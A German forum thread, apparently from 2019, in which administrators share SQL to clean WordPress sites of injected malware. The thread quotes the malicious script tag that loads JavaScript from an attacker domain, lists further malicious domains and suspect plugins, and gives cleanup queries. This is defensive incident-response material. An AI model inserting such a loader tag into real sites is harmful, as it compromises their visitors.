"Christmas - the time to fix the computers of your loved ones" « Lord Wyrm

Schneller Fix für Wordpress Malware: wiilberedmodels.com

mat 09.09.2019 - 17:56 3591 3 Thread rating
Posts

mat

Administrator
Legends never die
Avatar
Registered: Aug 2003
Location: nö
Posts: 25376
Nachdem ich gerade für einen Kunden mehrere Wordpress-Seiten von einer in dieser Form noch nicht dokumentierten Malware-Attacke befreit habe, dachte ich mir, dass ich den SQL-Code hier veröffentliche, der die Probleme bereinigt:

Der Schadcode lautet:

Code: JS
<script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script>

Folgende Fixes können zB per phpMyAdmin bei der betroffenen Datenbank eingespielt werden:

Code: SQL
UPDATE `wp_posts` SET post_content=REPLACE(post_content,"<script src='https://js.wiilberedmodels.com/pystats.js?l=l&' type=text/javascript language=javascript></script>","");

Es wird auch ein Admin-User mit unterschiedlichem Namen und einer ID > 900.000 angelegt. Diese könnt ihr händisch löschen. Folgendes SQL-Statement löscht euch alle User mit einer ID > 900.000 aus den Tabellen und setzt den Autoincrement-Wert der Tabellen zurück.

Code: SQL
DELETE FROM `wp_users` WHERE `wp_users`.`ID` > 900000;
DELETE FROM `wp_usermeta` WHERE `wp_usermeta`.`user_id` > 900000;
ALTER TABLE `wp_users` AUTO_INCREMENT = 1;
ALTER TABLE `wp_usermeta` AUTO_INCREMENT = 1;

Wichtig #1: Falls ein Cache-Plugin verwendet wird (WP SuperCache oder W3 Total Cache zB), dann muss der jeweilige Cache ebenfalls geleert werden!

Wichtig #2: Vor dem Ausführen des Codes sollte unbedingt die Datenbank gebackupt werden! Ich bin nicht für einen Datenverlust verantwortlich.

Derzeit gibt es noch keine Details wie der Schadcode in die Datenbank gelangt. Wahrscheinlich über eine Schwachstelle eines Wordpress-Plugins. Ich verdächtige derzeit den Advanced Access Manager oder das "Cookie Notice"-Plugin. Mehr Zeit hatte ich leider nicht. Ich bin mir sicher, dass in den nächsten Tagen mehr dazu auftaucht.

spunz

Super Moderator
Super Moderator
Avatar
Registered: Aug 2000
Location: achse des bösen
Posts: 11118
Ich hatte vergleichbares vor ~3 Wochen, neben AAM dürfte auch Simple 301 Redirects ein Einfallstor sein:

activeandbanflip.com
gabriellalovecats.com
developsincelock.com
jackielovedogs.com
wiilberedmodels.com

Smut

takeover &amp; ether
Avatar
Registered: Feb 2003
Location: VIE
Posts: 16632
Welche Version hatte WordPress zum Zeitpunkt der Kompromittierung?
Gab letzte Woche ein security Update.
https://wordpress.org/news/2019/09/...enance-release/

mat

Administrator
Legends never die
Avatar
Registered: Aug 2003
Location: nö
Posts: 25376
Alle drei Seiten, die ich befreit habe, waren letzte Woche am neuesten Stand. Es ist irgendwann im Laufe der letzten Woche passiert, der Hack wurde aber erst durch ein Login ins Admin Panel aktiv.

Edit: Dieser Punkt aus dem Change Log von 5.2.3 klingt sehr ähnlich.

Zitat
Props to Ian Dunn of the Core Security Team for finding and disclosing a case where reflected cross-site scripting could be found in the dashboard.
Kontakt | Unser Forum | Über overclockers.at | Impressum | Datenschutz